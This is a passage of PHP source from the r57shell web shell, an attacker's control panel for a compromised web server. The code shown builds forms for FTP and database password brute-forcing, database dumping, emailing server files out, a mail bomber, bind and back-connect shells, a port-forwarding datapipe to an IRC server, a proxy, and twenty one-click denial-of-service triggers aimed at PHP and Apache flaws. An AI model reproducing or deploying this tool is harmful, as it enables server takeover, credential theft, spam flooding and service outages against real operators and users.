echo $fs . $table_up1 . div_title($lang[$language . '_text15'], 'id31') . $table_up2 . div('id31') . $ts;
echo sr(15, "<b>" . $lang[$language . '_text16'] . $arrow . "</b>", "<select size=\"1\" name=\"with\">" . $select . "</select>" . in('hidden', 'dir', 0, $dir) . ws(2) . "<b>" . $lang[$language . '_text17'] . $arrow . "</b>" . in('text', 'rem_file', 78, 'http://'));
echo sr(15, "<b>" . $lang[$language . '_text18'] . $arrow . "</b>", in('text', 'loc_file', 105, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt2']));
echo $te . '</div>' . $table_end1 . $fe;
}
echo $fs . $table_up1 . div_title($lang[$language . '_text86'], 'id32') . $table_up2 . div('id32') . $ts;
echo sr(15, "<b>" . $lang[$language . '_text59'] . $arrow . "</b>", in('text', 'd_name', 85, $dir) . in('hidden', 'cmd', 0, 'download_file') . in('hidden', 'dir', 0, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt14']));
$arh = $lang[$language . '_text92'];
if (@function_exists('gzcompress')) {
$arh.= in('radio', 'compress', 0, 'zip') . ' zip';
}
if (@function_exists('gzencode')) {
$arh.= in('radio', 'compress', 0, 'gzip') . ' gzip';
}
if (@function_exists('bzcompress')) {
$arh.= in('radio', 'compress', 0, 'bzip') . ' bzip';
}
echo sr(15, "<b>" . $lang[$language . '_text91'] . $arrow . "</b>", in('radio', 'compress', 0, 'none', 1) . ' ' . $arh);
echo $te . '</div>' . $table_end1 . $fe;
if (@function_exists("ftp_connect")) {
echo $table_up1 . div_title($lang[$language . '_text93'], 'id33') . $table_up2 . div('id33') . $ts . "<tr>" . $fs . "<td valign=top width=33%>" . $ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text94'] . "</div></b></font>";
echo sr(25, "<b>" . $lang[$language . '_text88'] . $arrow . "</b>", in('text', 'ftp_server_port', 20, (!empty($_POST['ftp_server_port']) ? ($_POST['ftp_server_port']) : ("127.0.0.1:21"))) . in('hidden', 'cmd', 0, 'ftp_brute') . in('hidden', 'dir', 0, $dir));
echo sr(25, "", in('radio', 'brute_method', 0, 'passwd', 1) . "<font face=Verdana size=-2>" . $lang[$language . '_text99'] . " ( <a href=''PHP_SELF'] . "?users>" . $lang[$language . '_text95'] . "</a> )</font>");
echo sr(25, "", in('checkbox', 'reverse id=reverse', 0, '1', 1) . $lang[$language . '_text101']);
echo sr(25, "", in('radio', 'brute_method', 0, 'dic', 0) . $lang[$language . '_text135']);
echo sr(25, "<b>" . $lang[$language . '_text37'] . $arrow . "</b>", in('text', 'ftp_login', 0, (!empty($_POST['ftp_login']) ? ($_POST['ftp_login']) : ("root"))));
echo sr(25, "<b>" . $lang[$language . '_text135'] . $arrow . "</b>", in('text', 'dictionary', 0, (!empty($_POST['dictionary']) ? ($_POST['dictionary']) : ($dir . '/passw.dic'))));
echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt1']));
echo $te . "</td>" . $fe . $fs . "<td valign=top width=33%>" . $ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text87'] . "</div></b></font>";
echo sr(25, "<b>" . $lang[$language . '_text88'] . $arrow . "</b>", in('text', 'ftp_server_port', 20, (!empty($_POST['ftp_server_port']) ? ($_POST['ftp_server_port']) : ("127.0.0.1:21"))));
echo sr(25, "<b>" . $lang[$language . '_text37'] . $arrow . "</b>", in('text', 'ftp_login', 20, (!empty($_POST['ftp_login']) ? ($_POST['ftp_login']) : ("anonymous"))));
echo sr(25, "<b>" . $lang[$language . '_text38'] . $arrow . "</b>", in('text', 'ftp_password', 20, (!empty($_POST['ftp_password']) ? ($_POST['ftp_password']) : ("billy@microsoft.com"))));
echo sr(25, "<b>" . $lang[$language . '_text89'] . $arrow . "</b>", in('text', 'ftp_file', 20, (!empty($_POST['ftp_file']) ? ($_POST['ftp_file']) : ("/ftp-dir/file"))) . in('hidden', 'cmd', 0, 'ftp_file_down'));
echo sr(25, "<b>" . $lang[$language . '_text18'] . $arrow . "</b>", in('text', 'loc_file', 20, $dir));
echo sr(25, "<b>" . $lang[$language . '_text90'] . $arrow . "</b>", "<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>" . in('hidden', 'dir', 0, $dir));
echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt14']));
echo $te . "</td>" . $fe . $fs . "<td valign=top width=33%>" . $ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text100'] . "</div></b></font>";
echo sr(25, "<b>" . $lang[$language . '_text88'] . $arrow . "</b>", in('text', 'ftp_server_port', 20, (!empty($_POST['ftp_server_port']) ? ($_POST['ftp_server_port']) : ("127.0.0.1:21"))));
echo sr(25, "<b>" . $lang[$language . '_text37'] . $arrow . "</b>", in('text', 'ftp_login', 20, (!empty($_POST['ftp_login']) ? ($_POST['ftp_login']) : ("anonymous"))));
echo sr(25, "<b>" . $lang[$language . '_text38'] . $arrow . "</b>", in('text', 'ftp_password', 20, (!empty($_POST['ftp_password']) ? ($_POST['ftp_password']) : ("billy@microsoft.com"))));
echo sr(25, "<b>" . $lang[$language . '_text18'] . $arrow . "</b>", in('text', 'loc_file', 20, $dir));
echo sr(25, "<b>" . $lang[$language . '_text89'] . $arrow . "</b>", in('text', 'ftp_file', 20, (!empty($_POST['ftp_file']) ? ($_POST['ftp_file']) : ("/ftp-dir/file"))) . in('hidden', 'cmd', 0, 'ftp_file_up'));
echo sr(25, "<b>" . $lang[$language . '_text90'] . $arrow . "</b>", "<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>" . in('hidden', 'dir', 0, $dir));
echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt2']));
echo $te . "</td>" . $fe . "</tr></div></table>";
}
if (@function_exists("mail")) {
echo $table_up1 . div_title($lang[$language . '_text102'], 'id35') . $table_up2 . div('id35') . $ts . "<tr>" . $fs . "<td valign=top width=33%>" . $ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text103'] . "</div></b></font>";
echo sr(25, "<b>" . $lang[$language . '_text105'] . $arrow . "</b>", in('text', 'to', 30, (!empty($_POST['to']) ? ($_POST['to']) : ("hacker@mail.com"))) . in('hidden', 'cmd', 0, 'mail') . in('hidden', 'dir', 0, $dir));
echo sr(25, "<b>" . $lang[$language . '_text106'] . $arrow . "</b>", in('text', 'from', 30, (!empty($_POST['from']) ? ($_POST['from']) : ("billy@microsoft.com"))));
echo sr(25, "<b>" . $lang[$language . '_text107'] . $arrow . "</b>", in('text', 'subj', 30, (!empty($_POST['subj']) ? ($_POST['subj']) : ("hello billy"))));
echo sr(25, "<b>" . $lang[$language . '_text108'] . $arrow . "</b>", '<textarea name=text cols=22 rows=2>' . (!empty($_POST['text']) ? ($_POST['text']) : ("mail text here")) . '</textarea>');
echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt15']));
echo $te . "</td>" . $fe . $fs . "<td valign=top width=33%>" . $ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text104'] . "</div></b></font>";
echo sr(25, "<b>" . $lang[$language . '_text105'] . $arrow . "</b>", in('text', 'to', 30, (!empty($_POST['to']) ? ($_POST['to']) : ("hacker@mail.com"))) . in('hidden', 'cmd', 0, 'mail_file') . in('hidden', 'dir', 0, $dir));
echo sr(25, "<b>" . $lang[$language . '_text106'] . $arrow . "</b>", in('text', 'from', 30, (!empty($_POST['from']) ? ($_POST['from']) : ("billy@microsoft.com"))));
echo sr(25, "<b>" . $lang[$language . '_text107'] . $arrow . "</b>", in('text', 'subj', 30, (!empty($_POST['subj']) ? ($_POST['subj']) : ("file from r57shell"))));
echo sr(25, "<b>" . $lang[$language . '_text18'] . $arrow . "</b>", in('text', 'loc_file', 30, $dir));
echo sr(25, "<b>" . $lang[$language . '_text91'] . $arrow . "</b>", in('radio', 'compress', 0, 'none', 1) . ' ' . $arh);
echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt15']));
echo $te . "</td>" . $fe . $fs . "<td valign=top width=33%>" . $ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text139'] . "</div></b></font>";
echo sr(25, "<b>" . $lang[$language . '_text105'] . $arrow . "</b>", in('text', 'to', 30, (!empty($_POST['to']) ? ($_POST['to']) : ("hacker@mail.com"))) . in('hidden', 'cmd', 0, 'mail_bomber') . in('hidden', 'dir', 0, $dir));
echo sr(25, "<b>" . $lang[$language . '_text106'] . $arrow . "</b>", in('text', 'from', 30, (!empty($_POST['from']) ? ($_POST['from']) : ("billy@microsoft.com"))));
echo sr(25, "<b>" . $lang[$language . '_text107'] . $arrow . "</b>", in('text', 'subj', 30, (!empty($_POST['subj']) ? ($_POST['subj']) : ("hello billy"))));
echo sr(25, "<b>" . $lang[$language . '_text108'] . $arrow . "</b>", '<textarea name=text cols=22 rows=1>' . (!empty($_POST['text']) ? ($_POST['text']) : ("flood text here")) . '</textarea>');
echo sr(25, "<b>Flood" . $arrow . "</b>", in('int', 'mail_flood', 5, (!empty($_POST['mail_flood']) ? ($_POST['mail_flood']) : 100)) . ws(4) . "<b>Size(kb)" . $arrow . "</b>" . in('int', 'mail_size', 5, (!empty($_POST['mail_size']) ? ($_POST['mail_size']) : 10)));
echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt15']));
echo $te . "</td>" . $fe . "</tr></div></table>";
}
if ($mysql_on || $mssql_on || $pg_on || $ora_on) {
$select = '<select name=db>';
if ($mysql_on) $select.= '<option>MySQL</option>';
if ($mssql_on) $select.= '<option>MSSQL</option>';
if ($pg_on) $select.= '<option>PostgreSQL</option>';
if ($ora_on) $select.= '<option>Oracle</option>';
$select.= '</select>';
echo $table_up1 . div_title($lang[$language . '_text82'], 'id36') . $table_up2 . div('id36') . $ts . "<tr>" . $fs . "<td valign=top width=33%>" . $ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text134'] . "</div></b></font>";
echo sr(35, "<b>" . $lang[$language . '_text80'] . $arrow . "</b>", $select . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'db_brute'));
echo sr(35, "<b>" . $lang[$language . '_text111'] . $arrow . "</b>", in('text', 'db_server', 8, (!empty($_POST['db_server']) ? ($_POST['db_server']) : ("localhost"))) . ' <b>:</b> ' . in('text', 'db_port', 8, (!empty($_POST['db_port']) ? ($_POST['db_port']) : ("3306"))));
echo sr(35, "<b>" . $lang[$language . '_text39'] . $arrow . "</b>", in('text', 'mysql_db', 8, (!empty($_POST['mysql_db']) ? ($_POST['mysql_db']) : ("mysql"))));
echo sr(25, "", in('radio', 'brute_method', 0, 'passwd', 1) . "<font face=Verdana size=-2>" . $lang[$language . '_text99'] . " ( <a href=''PHP_SELF'] . "?users>" . $lang[$language . '_text95'] . "</a> )</font>");
echo sr(25, "", in('checkbox', 'reverse id=reverse', 0, '1', 1) . $lang[$language . '_text101']);
echo sr(25, "", in('radio', 'brute_method', 0, 'dic', 0) . $lang[$language . '_text135']);
echo sr(35, "<b>" . $lang[$language . '_text37'] . $arrow . "</b>", in('text', 'mysql_l', 8, (!empty($_POST['mysql_l']) ? ($_POST['mysql_l']) : ("root"))));
echo sr(25, "<b>" . $lang[$language . '_text135'] . $arrow . "</b>", in('text', 'dictionary', 0, (!empty($_POST['dictionary']) ? ($_POST['dictionary']) : ($dir . '/passw.dic'))));
echo sr(35, "", in('submit', 'submit', 0, $lang[$language . '_butt1']));
echo $te . "</td>" . $fe . $fs . "<td valign=top width=33%>" . $ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text83'] . "</div></b></font>";
echo sr(35, "<b>" . $lang[$language . '_text80'] . $arrow . "</b>", $select);
echo sr(35, "<b>" . $lang[$language . '_text111'] . $arrow . "</b>", in('text', 'db_server', 8, (!empty($_POST['db_server']) ? ($_POST['db_server']) : ("localhost"))) . ' <b>:</b> ' . in('text', 'db_port', 8, (!empty($_POST['db_port']) ? ($_POST['db_port']) : ("3306"))));
echo sr(35, "<b>" . $lang[$language . '_text37'] . ' : ' . $lang[$language . '_text38'] . $arrow . "</b>", in('text', 'mysql_l', 8, (!empty($_POST['mysql_l']) ? ($_POST['mysql_l']) : ("root"))) . ' <b>:</b> ' . in('text', 'mysql_p', 8, (!empty($_POST['mysql_p']) ? ($_POST['mysql_p']) : ("password"))));
echo sr(35, "<b>" . $lang[$language . '_text36'] . $arrow . "</b>", in('text', 'mysql_db', 8, (!empty($_POST['mysql_db']) ? ($_POST['mysql_db']) : ("mysql"))) . ' <b>.</b> ' . in('text', 'mysql_tbl', 8, (!empty($_POST['mysql_tbl']) ? ($_POST['mysql_tbl']) : ("user"))));
echo sr(35, in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'mysql_dump') . "<b>" . $lang[$language . '_text41'] . $arrow . "</b>", in('checkbox', 'dif id=dif', 0, '1') . in('text', 'dif_name', 17, (!empty($_POST['dif_name']) ? ($_POST['dif_name']) : ("dump.sql"))));
echo sr(35, "", in('submit', 'submit', 0, $lang[$language . '_butt9']));
echo $te . "</td>" . $fe . $fs . "<td valign=top width=33%>" . $ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text83'] . "</div></b></font>";
echo sr(35, "<b>" . $lang[$language . '_text80'] . $arrow . "</b>", $select);
echo sr(35, "<b>" . $lang[$language . '_text111'] . $arrow . "</b>", in('text', 'db_server', 8, (!empty($_POST['db_server']) ? ($_POST['db_server']) : ("localhost"))) . ' <b>:</b> ' . in('text', 'db_port', 8, (!empty($_POST['db_port']) ? ($_POST['db_port']) : ("3306"))));
echo sr(35, "<b>" . $lang[$language . '_text37'] . ' : ' . $lang[$language . '_text38'] . $arrow . "</b>", in('text', 'mysql_l', 8, (!empty($_POST['mysql_l']) ? ($_POST['mysql_l']) : ("root"))) . ' <b>:</b> ' . in('text', 'mysql_p', 8, (!empty($_POST['mysql_p']) ? ($_POST['mysql_p']) : ("password"))));
echo sr(35, "<b>" . $lang[$language . '_text39'] . $arrow . "</b>", in('text', 'mysql_db', 8, (!empty($_POST['mysql_db']) ? ($_POST['mysql_db']) : ("mysql"))));
echo sr(35, "<b>" . $lang[$language . '_text84'] . $arrow . "</b>" . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'db_query'), "");
echo $te . "<div align=center id='n'><textarea cols=30 rows=4 name=db_query>" . (!empty($_POST['db_query']) ? ($_POST['db_query']) : ("SHOW DATABASES;\nSHOW TABLES;\nSELECT * FROM user;\nSELECT version();\nSELECT user();")) . "</textarea><br>" . in('submit', 'submit', 0, $lang[$language . '_butt1']) . "</div>";
echo "</td>" . $fe . "</tr></div></table>";
}
if (!$safe_mode && $unix) {
echo $table_up1 . div_title($lang[$language . '_text81'], 'id37') . $table_up2 . div('id37') . $ts . "<tr>" . $fs . "<td valign=top width=25%>" . $ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text9'] . "</div></b></font>";
echo sr(40, "<b>" . $lang[$language . '_text10'] . $arrow . "</b>", in('text', 'port', 10, '11457'));
echo sr(40, "<b>" . $lang[$language . '_text11'] . $arrow . "</b>", in('text', 'bind_pass', 10, 'r57'));
echo sr(40, "<b>" . $lang[$language . '_text20'] . $arrow . "</b>", "<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>" . in('hidden', 'dir', 0, $dir));
echo sr(40, "", in('submit', 'submit', 0, $lang[$language . '_butt3']));
echo $te . "</td>" . $fe . $fs . "<td valign=top width=25%>" . $ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text12'] . "</div></b></font>";
echo sr(40, "<b>" . $lang[$language . '_text13'] . $arrow . "</b>", in('text', 'ip', 15, ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
echo sr(40, "<b>" . $lang[$language . '_text14'] . $arrow . "</b>", in('text', 'port', 15, '11457'));
echo sr(40, "<b>" . $lang[$language . '_text20'] . $arrow . "</b>", "<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>" . in('hidden', 'dir', 0, $dir));
echo sr(40, "", in('submit', 'submit', 0, $lang[$language . '_butt4']));
echo $te . "</td>" . $fe . $fs . "<td valign=top width=25%>" . $ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text22'] . "</div></b></font>";
echo sr(40, "<b>" . $lang[$language . '_text23'] . $arrow . "</b>", in('text', 'local_port', 10, '11457'));
echo sr(40, "<b>" . $lang[$language . '_text24'] . $arrow . "</b>", in('text', 'remote_host', 10, 'irc.dalnet.ru'));
echo sr(40, "<b>" . $lang[$language . '_text25'] . $arrow . "</b>", in('text', 'remote_port', 10, '6667'));
echo sr(40, "<b>" . $lang[$language . '_text26'] . $arrow . "</b>", "<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>" . in('hidden', 'dir', 0, $dir));
echo sr(40, "", in('submit', 'submit', 0, $lang[$language . '_butt5']));
echo $te . "</td>" . $fe . $fs . "<td valign=top width=25%>" . $ts;
echo "<font face=Verdana size=-2><b><div align=center id='n'>Proxy</div></b></font>";
echo sr(40, "<b>" . $lang[$language . '_text10'] . $arrow . "</b>", in('text', 'proxy_port', 10, '31337'));
echo sr(40, "<b>" . $lang[$language . '_text26'] . $arrow . "</b>", "<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option></select>" . in('hidden', 'dir', 0, $dir));
echo sr(40, "", in('submit', 'submit', 0, $lang[$language . '_butt5']));
echo $te . "</td>" . $fe . "</tr></div></table>";
}
echo $table_up1 . div_title($lang[$language . '_text140'], 'id38') . $table_up2 . div('id38') . $ts . "<tr><td valign=top width=50%>" . $ts;
echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>" . $lang[$language . '_text141'] . "</div></b></font>";
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos1') . in('submit', 'submit', 0, 'Recursive memory exhaustion') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos2') . in('submit', 'submit', 0, 'Memory_limit exhaustion in [ pack() ] function') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos3') . in('submit', 'submit', 0, 'BoF in [ unserialize() ] function') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos4') . in('submit', 'submit', 0, 'Limit integer calculate (65535) in ZendEngine') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos5') . in('submit', 'submit', 0, 'SQlite [ dl() ] vulnerability') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos6') . in('submit', 'submit', 0, 'PCRE [ preg_match() ] exhaustion resources (PHP <5.2.1)') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos7') . in('submit', 'submit', 0, 'Memory_limit exhaustion in [ str_repeat() ] function (PHP <4.4.5,5.2.1)') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos8') . in('submit', 'submit', 0, 'Apache process killer') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos9') . in('submit', 'submit', 0, 'Overload inodes from HD.I via [ tempnam() ] (PHP 4.4.2, 5.1.2)') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos10') . in('submit', 'submit', 0, 'BoF in [ wordwrap() ] function (PHP <4.4.2,5.1.2)') . $fe);
echo $te . "</td><td valign=top width=50%>" . $ts;
echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>" . $lang[$language . '_text141'] . "</div></b></font>";
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos11') . in('submit', 'submit', 0, 'BoF in [ array_fill() ] function (PHP <4.4.2,5.1.2)') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos12') . in('submit', 'submit', 0, 'BoF in [ substr_compare() ] function (PHP <4.4.2,5.1.2)') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos13') . in('submit', 'submit', 0, 'Array Creation in [ unserialize() ] 64 bit function (PHP <5.2.1)') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos14') . in('submit', 'submit', 0, 'BoF in [ str_ireplace() ] function (PHP <5.2.x)') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos15') . in('submit', 'submit', 0, 'BoF in [ htmlentities() ] function (PHP <5.1.6,4.4.4)') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos16') . in('submit', 'submit', 0, 'Integer Overflow in [ zip_entry_read() ] function (PHP <4.4.5)') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos17') . in('submit', 'submit', 0, 'BoF in [ sqlite_udf_decode_binary() ] function (PHP <4.4.5,5.2.1)') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos18') . in('submit', 'submit', 0, 'Memory Allocation BoF in [ msg_receive() ] function (PHP <4.4.5,5.2.1)') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos19') . in('submit', 'submit', 0, 'Off By One in [ php_stream_filter_create() ] function (PHP 5<5.2.1)') . $fe);
echo sr(10, "", $fs . in('hidden', 'cmd', 0, 'dos20') . in('submit', 'submit', 0, 'Reference Counter Overflow in [ unserialize() ] function (PHP <4.4.4)') . $fe);
echo $te . "</td></tr></div></table>";
